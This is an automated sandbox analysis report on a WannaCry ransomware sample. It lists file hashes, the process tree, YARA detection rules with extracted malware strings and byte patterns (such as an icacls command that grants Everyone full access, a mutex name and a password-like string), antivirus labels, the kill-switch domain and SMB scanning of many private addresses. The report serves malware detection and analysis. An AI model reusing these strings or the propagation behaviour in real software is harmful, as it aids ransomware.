Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ee3RWj3ID9.exe

Overview

General Information

Sample Name:Ee3RWj3ID9.exe
Analysis ID:722444
MD5:b450d58f0d0dc6e3ddbcde263a4e74d4
SHA1:e661747c684a4a882d6ffdd4a449d469ed3f9b7b
SHA256:999c88589a40c7321c46d3ce53f6c2ca8d0a1ed34601c3c33e2995fd3e066297
Infos:

Detection

Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Connects to many different private IPs (likely to spread or exploit)
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Connects to many different private IPs via SMB (likely to spread or exploit)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • Ee3RWj3ID9.exe (PID: 4740 cmdline: C:\Users\user\Desktop\Ee3RWj3ID9.exe MD5: B450D58F0D0DC6E3DDBCDE263A4E74D4)
    • tasksche.exe (PID: 644 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 9B79FA675DFDAAA9E8A2B3FD917BEF0C)
  • Ee3RWj3ID9.exe (PID: 5764 cmdline: C:\Users\user\Desktop\Ee3RWj3ID9.exe -m security MD5: B450D58F0D0DC6E3DDBCDE263A4E74D4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Ee3RWj3ID9.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
  • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
Ee3RWj3ID9.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__
Ee3RWj3ID9.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    Ee3RWj3ID9.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    Ee3RWj3ID9.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
    • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
    • 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\tasksche.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0xf4d8:$x3: tasksche.exe
    • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0xf52c:$x5: WNcry@2ol7
    • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xf42c:$s3: cmd.exe /c "%s"
    • 0x41980:$s4: msg/m_portuguese.wnry
    • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
    • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
    C:\Windows\tasksche.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    C:\Windows\tasksche.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.302317167.000000000040F000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000001.00000000.305681909.000000000040F000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
          • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
          • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
          00000002.00000000.309616017.000000000040E000.00000008.00000001.01000000.00000005.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
          • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
          • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
          Click to see the 11 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.Ee3RWj3ID9.exe.24f98c8.7.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
          • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
          • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
          • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
          0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
          • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
          • 0xf4d8:$x3: tasksche.exe
          • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
          • 0xf52c:$x5: WNcry@2ol7
          • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
          • 0xf42c:$s3: cmd.exe /c "%s"
          • 0x41980:$s4: msg/m_portuguese.wnry
          • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
          • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
          • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
          0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
          • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
          • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
          0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpackWin32_Ransomware_WannaCryunknownReversingLabs
          • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
          • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
          1.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
          • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
          • 0xf4d8:$x3: tasksche.exe
          • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
          • 0xf52c:$x5: WNcry@2ol7
          • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
          • 0xf42c:$s3: cmd.exe /c "%s"
          • 0x41980:$s4: msg/m_portuguese.wnry
          • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
          • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
          • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
          Click to see the 87 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.48.8.8.856572532830018 10/13/22-14:53:07.238751
          SID:2830018
          Source Port:56572
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.859683532830018 10/13/22-14:53:08.730651
          SID:2830018
          Source Port:59683
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Ee3RWj3ID9.exeVirustotal: Detection: 81%Perma Link
          Antivirus / Scanner detection for submitted sample
          Source: Ee3RWj3ID9.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comURL Reputation: Label: malware
          Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/URL Reputation: Label: malware
          Source: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/y9XAvira URL Cloud: Label: malware
          Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/:;PAvira URL Cloud: Label: malware
          Source: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/(Avira URL Cloud: Label: malware
          Source: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comVirustotal: Detection: 13%Perma Link
          Source: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comVirustotal: Detection: 13%Perma Link
          Source: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/Virustotal: Detection: 13%Perma Link
          Antivirus detection for dropped file
          Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/Ransom.Gen
          Machine Learning detection for sample
          Source: Ee3RWj3ID9.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Windows\tasksche.exeJoe Sandbox ML: detected
          Source: 2.2.tasksche.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.unpackAvira: Label: TR/Ransom.Gen
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpackAvira: Label: TR/Ransom.Gen
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
          Source: 2.0.tasksche.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.unpackAvira: Label: TR/Ransom.Gen
          Source: C:\Windows\tasksche.exeCode function: 2_2_004018B9 CryptReleaseContext,2_2_004018B9

          Exploits

          barindex
          Connects to many different private IPs (likely to spread or exploit)
          Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
          Connects to many different private IPs via SMB (likely to spread or exploit)
          Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
